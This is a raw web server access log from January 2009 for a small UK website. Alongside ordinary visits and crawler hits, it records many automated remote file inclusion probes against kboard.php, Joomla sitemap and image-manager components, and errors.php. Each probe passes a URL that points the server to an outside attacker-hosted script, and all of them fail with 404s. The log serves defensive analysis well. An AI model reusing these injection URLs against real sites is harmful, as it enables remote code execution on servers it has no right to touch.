64.22.83.22 - - [02/Jan/2009:23:11:22 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.stadtgezeiten.de/layout/layout.txt??? HTTP/1.1" 404 362 "-" "libwww-perl/5.810" 246 601
64.22.83.22 - - [02/Jan/2009:23:11:22 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.stadtgezeiten.de/layout/layout.txt??? HTTP/1.1" 404 347 "-" "libwww-perl/5.810" 232 586
64.22.83.22 - - [02/Jan/2009:23:11:23 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.stadtgezeiten.de/layout/layout.txt??? HTTP/1.1" 404 352 "-" "libwww-perl/5.810" 236 591
193.34.150.208 - - [02/Jan/2009:23:11:36 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cogetur.com/meteo/dat/dat.jpg??? HTTP/1.1" 404 362 "-" "libwww-perl/5.805" 237 601
193.34.150.208 - - [02/Jan/2009:23:11:36 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cogetur.com/meteo/dat/dat.jpg??? HTTP/1.1" 404 347 "-" "libwww-perl/5.805" 223 586
193.34.150.208 - - [02/Jan/2009:23:11:36 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cogetur.com/meteo/dat/dat.jpg??? HTTP/1.1" 404 352 "-" "libwww-perl/5.805" 227 591
84.16.224.119 - - [02/Jan/2009:23:11:55 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://g2staff.com/components/com_fpslideshow/images/layout.txt??? HTTP/1.1" 404 362 "-" "libwww-perl/5.79" 235 601
84.16.224.119 - - [02/Jan/2009:23:11:55 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://g2staff.com/components/com_fpslideshow/images/layout.txt??? HTTP/1.1" 404 347 "-" "libwww-perl/5.79" 221 586
84.16.224.119 - - [02/Jan/2009:23:11:55 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://g2staff.com/components/com_fpslideshow/images/layout.txt??? HTTP/1.1" 404 352 "-" "libwww-perl/5.79" 225 591
77.221.130.2 - - [02/Jan/2009:23:12:23 +0000] "GET /log/web.log/apboard/add.php?APB_rp=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 364 "-" "libwww-perl/5.805" 189 603
222.231.47.146 - - [02/Jan/2009:23:12:47 +0000] "GET /log/web.log.1%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://geocities.com/kombinasi2000/id.txt???? HTTP/1.1" 404 386 "-" "libwww-perl/5.805" 236 625
193.47.80.39 - - [02/Jan/2009:23:13:01 +0000] "GET /robots.txt HTTP/1.1" 404 347 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 257 586
193.47.80.39 - - [02/Jan/2009:23:13:01 +0000] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 341 211
193.207.106.54 - - [02/Jan/2009:23:14:53 +0000] "GET /log/web.log.1/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://geocities.com/kombinasi2000/id.txt?%0D?? HTTP/1.1" 404 385 "-" "libwww-perl/5.79" 206 624
85.214.41.248 - - [02/Jan/2009:23:15:46 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=xm/id.txt??? HTTP/1.1" 404 347 "-" "libwww-perl/5.805" 196 586
85.214.41.248 - - [02/Jan/2009:23:15:46 +0000] "GET /log/web.log.3%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=xm/id.txt??? HTTP/1.1" 404 363 "-" "libwww-perl/5.805" 213 602
85.214.41.248 - - [02/Jan/2009:23:15:46 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=xm/id.txt??? HTTP/1.1" 404 352 "-" "libwww-perl/5.805" 200 591
217.148.95.133 - - [02/Jan/2009:23:17:09 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 347 "-" "Mozilla/5.0" 224 586
217.148.95.133 - - [02/Jan/2009:23:17:09 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 352 "-" "Mozilla/5.0" 228 591
217.148.95.133 - - [02/Jan/2009:23:17:10 +0000] "GET /log/web.log.3%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 364 "-" "Mozilla/5.0" 244 603
72.30.65.54 - - [02/Jan/2009:23:24:26 +0000] "GET /Gallery6.htm HTTP/1.0" 200 6197 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 228 6513
193.207.106.54 - - [02/Jan/2009:23:26:26 +0000] "GET /log/web.log.1%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://geocities.com/kombinasi2000/id.txt?%0D?? HTTP/1.1" 404 386 "-" "libwww-perl/5.79" 209 625
218.234.21.131 - - [02/Jan/2009:23:31:05 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://srip.yonsei.ac.kr/zboard_eng//skin/zero_vote/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.79" 223 591
218.234.21.131 - - [02/Jan/2009:23:31:05 +0000] "GET /log/web.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://srip.yonsei.ac.kr/zboard_eng//skin/zero_vote/info.txt???? HTTP/1.1" 404 360 "-" "libwww-perl/5.79" 231 599
218.234.21.131 - - [02/Jan/2009:23:31:05 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://srip.yonsei.ac.kr/zboard_eng//skin/zero_vote/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.79" 219 586
83.104.50.248 - - [02/Jan/2009:23:36:06 +0000] "GET / HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 342 249
83.104.50.248 - - [02/Jan/2009:23:36:06 +0000] "GET /YTCC.css HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 382 247
83.104.50.248 - - [02/Jan/2009:23:36:06 +0000] "GET /PageHeader1b.jpg HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 392 249
83.104.50.248 - - [02/Jan/2009:23:36:06 +0000] "GET /HomeButton.swf HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 416 247
83.104.50.248 - - [02/Jan/2009:23:36:06 +0000] "GET /DiaryButton.swf HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 417 248
83.104.50.248 - - [02/Jan/2009:23:36:06 +0000] "GET /FormsButton.swf HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 417 247
83.104.50.248 - - [02/Jan/2009:23:36:06 +0000] "GET /NowThenSithee.swf HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 419 247
83.104.50.248 - - [02/Jan/2009:23:36:06 +0000] "GET /GalleryButton.swf HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 419 247
83.104.50.248 - - [02/Jan/2009:23:36:06 +0000] "GET /ShowreportsButton.swf HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 423 247
83.104.50.248 - - [02/Jan/2009:23:36:06 +0000] "GET /WR%20Current%20logo1.jpg HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 399 248
83.104.50.248 - - [02/Jan/2009:23:36:06 +0000] "GET /Index_clip_image002.jpg HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 398 248
83.104.50.248 - - [02/Jan/2009:23:36:06 +0000] "GET /banner-468.jpg HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 389 248
83.104.50.248 - - [02/Jan/2009:23:36:06 +0000] "GET /Logo%20with%20letters1_small.jpg HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 407 248
83.104.50.248 - - [02/Jan/2009:23:36:06 +0000] "GET /news_in_bigred.jpg HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 393 248
83.104.50.248 - - [02/Jan/2009:23:36:06 +0000] "GET /get_adobe_reader.gif HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 394 247
91.186.21.200 - - [02/Jan/2009:23:36:13 +0000] "GET /errors.php?error=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 347 "-" "libwww-perl/5.810" 180 586
91.186.21.200 - - [02/Jan/2009:23:41:37 +0000] "GET /log/web.log.3/errors.php?error=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 361 "-" "libwww-perl/5.810" 194 600
91.186.21.200 - - [02/Jan/2009:23:41:37 +0000] "GET /errors.php?error=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 347 "-" "libwww-perl/5.810" 180 586
91.186.21.200 - - [02/Jan/2009:23:41:37 +0000] "GET /log/errors.php?error=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 351 "-" "libwww-perl/5.810" 184 590
91.186.21.200 - - [02/Jan/2009:23:41:59 +0000] "GET /log/web.log/errors.php?error=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 359 "-" "libwww-perl/5.810" 192 598
200.61.165.105 - - [02/Jan/2009:23:42:09 +0000] "GET /log/web.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.geocities.com/sijabirong/id2.txt?? HTTP/1.1" 404 360 "-" "libwww-perl/5.800" 213 599
200.61.165.105 - - [02/Jan/2009:23:42:15 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.geocities.com/sijabirong/id2.txt?? HTTP/1.1" 404 347 "-" "libwww-perl/5.800" 201 586
200.61.165.105 - - [02/Jan/2009:23:42:16 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.geocities.com/sijabirong/id2.txt?? HTTP/1.1" 404 352 "-" "libwww-perl/5.800" 205 591
200.61.165.105 - - [02/Jan/2009:23:42:40 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.geocities.com/sijabirong/id2.txt?? HTTP/1.1" 404 362 "-" "libwww-perl/5.800" 215 601
87.101.4.49 - - [02/Jan/2009:23:56:00 +0000] "GET /sitemap.php?mosConfig_admin_path=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 404 348 "-" "libwww-perl/5.79" 199 587
87.101.4.49 - - [03/Jan/2009:00:05:15 +0000] "GET /log/web.log.1/sitemap.php?mosConfig_admin_path=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 404 362 "-" "libwww-perl/5.79" 213 601
87.101.4.49 - - [03/Jan/2009:00:05:15 +0000] "GET /sitemap.php?mosConfig_admin_path=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 404 348 "-" "libwww-perl/5.79" 199 587
87.101.4.49 - - [03/Jan/2009:00:05:15 +0000] "GET /log/sitemap.php?mosConfig_admin_path=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 404 352 "-" "libwww-perl/5.79" 203 591
65.98.75.107 - - [03/Jan/2009:00:09:24 +0000] "GET /log/web.log.3/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.805" 227 624
65.98.75.107 - - [03/Jan/2009:00:09:24 +0000] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 371 "-" "libwww-perl/5.805" 213 610
65.98.75.107 - - [03/Jan/2009:00:09:24 +0000] "GET /log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 375 "-" "libwww-perl/5.805" 217 614
65.98.75.107 - - [03/Jan/2009:00:10:29 +0000] "GET /log/web.log.1/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.805" 227 624
65.98.75.107 - - [03/Jan/2009:00:10:46 +0000] "GET /log/web.log.1%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 386 "-" "libwww-perl/5.805" 230 625
65.98.75.107 - - [03/Jan/2009:00:10:46 +0000] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 371 "-" "libwww-perl/5.805" 213 610
65.98.75.107 - - [03/Jan/2009:00:10:46 +0000] "GET /log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 375 "-" "libwww-perl/5.805" 217 614
65.98.75.107 - - [03/Jan/2009:00:11:26 +0000] "GET /log/web.log.3/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.805" 227 624
65.98.75.107 - - [03/Jan/2009:00:12:23 +0000] "GET /log/web.log.1/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.805" 227 624
65.98.75.107 - - [03/Jan/2009:00:15:35 +0000] "GET /log/web.log.1%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 386 "-" "libwww-perl/5.805" 230 625
64.246.36.8 - - [03/Jan/2009:00:16:22 +0000] "GET /log/web.log.1%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://qweqwe.fileave.com/id.txt???? HTTP/1.1" 404 386 "-" "libwww-perl/5.805" 227 625
64.246.36.8 - - [03/Jan/2009:00:16:22 +0000] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://qweqwe.fileave.com/id.txt???? HTTP/1.1" 404 371 "-" "libwww-perl/5.805" 210 610
64.246.36.8 - - [03/Jan/2009:00:16:23 +0000] "GET /log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://qweqwe.fileave.com/id.txt???? HTTP/1.1" 404 375 "-" "libwww-perl/5.805" 214 614
64.246.36.8 - - [03/Jan/2009:00:17:49 +0000] "GET /log/web.log.3/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://qweqwe.fileave.com/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.805" 224 624
72.29.85.242 - - [03/Jan/2009:00:19:10 +0000] "GET /log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.casted.ru/bodo.txt??? HTTP/1.1" 404 379 "-" "libwww-perl/5.820" 217 618
72.29.85.242 - - [03/Jan/2009:00:19:10 +0000] "GET /log/web.log.1/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.casted.ru/bodo.txt??? HTTP/1.1" 404 389 "-" "libwww-perl/5.820" 227 628
72.29.85.242 - - [03/Jan/2009:00:19:10 +0000] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.casted.ru/bodo.txt??? HTTP/1.1" 404 375 "-" "libwww-perl/5.820" 213 614
64.246.36.8 - - [03/Jan/2009:00:19:26 +0000] "GET /log/web.log.1/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://qweqwe.fileave.com/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.805" 224 624
216.58.238.85 - - [03/Jan/2009:00:20:07 +0000] "GET /log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.casted.ru/bodo.txt??? HTTP/1.1" 404 379 "-" "libwww-perl/5.805" 217 618
216.58.238.85 - - [03/Jan/2009:00:20:07 +0000] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.casted.ru/bodo.txt??? HTTP/1.1" 404 375 "-" "libwww-perl/5.805" 213 614
216.58.238.85 - - [03/Jan/2009:00:20:07 +0000] "GET /log/web.log.1/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.casted.ru/bodo.txt??? HTTP/1.1" 404 389 "-" "libwww-perl/5.805" 227 628
64.246.36.8 - - [03/Jan/2009:00:21:02 +0000] "GET /log/web.log.3/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://qweqwe.fileave.com/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.805" 224 624
64.246.36.8 - - [03/Jan/2009:00:21:02 +0000] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://qweqwe.fileave.com/id.txt???? HTTP/1.1" 404 371 "-" "libwww-perl/5.805" 210 610
64.246.36.8 - - [03/Jan/2009:00:21:02 +0000] "GET /log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://qweqwe.fileave.com/id.txt???? HTTP/1.1" 404 375 "-" "libwww-perl/5.805" 214 614
66.7.194.31 - - [03/Jan/2009:00:21:23 +0000] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 371 "-" "libwww-perl/5.811" 213 610
66.7.194.31 - - [03/Jan/2009:00:21:23 +0000] "GET /log/web.log.3/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.811" 227 624
66.7.194.31 - - [03/Jan/2009:00:21:23 +0000] "GET /log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 375 "-" "libwww-perl/5.811" 217 614
70.85.235.50 - - [03/Jan/2009:00:22:00 +0000] "GET /log/error.log/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nshands.com/includes/bo.do%0D?? HTTP/1.1" 404 416 "-" "libwww-perl/5.811" 260 655
70.85.235.50 - - [03/Jan/2009:00:22:00 +0000] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nshands.com/includes/bo.do%0D?? HTTP/1.1" 404 402 "-" "libwww-perl/5.811" 246 641
70.85.235.50 - - [03/Jan/2009:00:22:01 +0000] "GET /log/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nshands.com/includes/bo.do%0D?? HTTP/1.1" 404 406 "-" "libwww-perl/5.811" 250 645
70.85.235.50 - - [03/Jan/2009:00:22:03 +0000] "GET /log/error.log/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nshands.com/includes/bo.do%0D?? HTTP/1.1" 404 416 "-" "libwww-perl/5.811" 260 655
70.85.235.50 - - [03/Jan/2009:00:22:04 +0000] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nshands.com/includes/bo.do%0D?? HTTP/1.1" 404 402 "-" "libwww-perl/5.811" 246 641
70.85.235.50 - - [03/Jan/2009:00:22:04 +0000] "GET /log/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nshands.com/includes/bo.do%0D?? HTTP/1.1" 404 406 "-" "libwww-perl/5.811" 250 645
70.85.235.50 - - [03/Jan/2009:00:22:52 +0000] "GET /log/error.log/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/hotel/index.php/bo.do?? HTTP/1.1" 404 416 "-" "libwww-perl/5.811" 279 655
70.85.235.50 - - [03/Jan/2009:00:22:53 +0000] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/hotel/index.php/bo.do?? HTTP/1.1" 404 402 "-" "libwww-perl/5.811" 265 641
70.85.235.50 - - [03/Jan/2009:00:22:53 +0000] "GET /log/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/hotel/index.php/bo.do?? HTTP/1.1" 404 406 "-" "libwww-perl/5.811" 269 645
64.246.36.8 - - [03/Jan/2009:00:22:53 +0000] "GET /log/web.log.1/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://qweqwe.fileave.com/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.805" 224 624
66.7.194.31 - - [03/Jan/2009:00:23:10 +0000] "GET /log/web.log.1/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.811" 227 624
66.7.194.31 - - [03/Jan/2009:00:23:24 +0000] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 371 "-" "libwww-perl/5.811" 213 610
66.7.194.31 - - [03/Jan/2009:00:23:24 +0000] "GET /log/web.log.3/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.811" 227 624
66.7.194.31 - - [03/Jan/2009:00:23:24 +0000] "GET /log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 375 "-" "libwww-perl/5.811" 217 614
66.7.194.31 - - [03/Jan/2009:00:25:04 +0000] "GET /log/web.log.1/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.811" 227 624
66.7.194.31 - - [03/Jan/2009:00:26:47 +0000] "GET /log/web.log.1%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 386 "-" "libwww-perl/5.811" 230 625
64.246.36.8 - - [03/Jan/2009:00:28:15 +0000] "GET /log/web.log.1%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://qweqwe.fileave.com/id.txt???? HTTP/1.1" 404 386 "-" "libwww-perl/5.805" 227 625
77.68.43.46 - - [03/Jan/2009:00:33:07 +0000] "GET / HTTP/1.1" 200 16348 "http://www.mgb-stuff.org.uk/eventsdetail.htm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 328 16703
66.7.194.31 - - [03/Jan/2009:00:33:44 +0000] "GET /log/web.log.1%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 386 "-" "libwww-perl/5.811" 230 625
83.104.50.248 - - [03/Jan/2009:00:43:55 +0000] "GET / HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 342 249
83.104.50.248 - - [03/Jan/2009:00:43:55 +0000] "GET /YTCC.css HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 382 247
83.104.50.248 - - [03/Jan/2009:00:43:55 +0000] "GET /PageHeader1b.jpg HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 392 249
83.104.50.248 - - [03/Jan/2009:00:43:55 +0000] "GET /HomeButton.swf HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 416 247
83.104.50.248 - - [03/Jan/2009:00:43:55 +0000] "GET /FormsButton.swf HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 417 247
83.104.50.248 - - [03/Jan/2009:00:43:55 +0000] "GET /DiaryButton.swf HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 417 248
83.104.50.248 - - [03/Jan/2009:00:43:55 +0000] "GET /NowThenSithee.swf HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 419 247
83.104.50.248 - - [03/Jan/2009:00:43:55 +0000] "GET /GalleryButton.swf HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 419 247
83.104.50.248 - - [03/Jan/2009:00:43:55 +0000] "GET /ShowreportsButton.swf HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 423 247
83.104.50.248 - - [03/Jan/2009:00:43:55 +0000] "GET /WR%20Current%20logo1.jpg HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 399 248
83.104.50.248 - - [03/Jan/2009:00:43:56 +0000] "GET /Index_clip_image002.jpg HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 398 248
83.104.50.248 - - [03/Jan/2009:00:43:56 +0000] "GET /banner-468.jpg HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 389 248
83.104.50.248 - - [03/Jan/2009:00:43:56 +0000] "GET /Logo%20with%20letters1_small.jpg HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 407 248
83.104.50.248 - - [03/Jan/2009:00:43:56 +0000] "GET /news_in_bigred.jpg HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 393 248
83.104.50.248 - - [03/Jan/2009:00:43:56 +0000] "GET /get_adobe_reader.gif HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 394 247
61.192.221.65 - - [03/Jan/2009:00:54:50 +0000] "GET / HTTP/1.1" 200 16348 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 146 16665
208.115.117.37 - - [03/Jan/2009:00:57:26 +0000] "GET /administrator/components/com_madeira/photoupload.phphttp://clan.gotr00t.net/temp//ctrl.txt???? HTTP/1.1" 404 427 "-" "libwww-perl/5.822" 212 666
208.115.117.37 - - [03/Jan/2009:00:57:26 +0000] "GET /log/error.log/administrator/components/com_madeira/photoupload.phphttp://clan.gotr00t.net/temp//ctrl.txt???? HTTP/1.1" 404 441 "-" "libwww-perl/5.822" 226 680
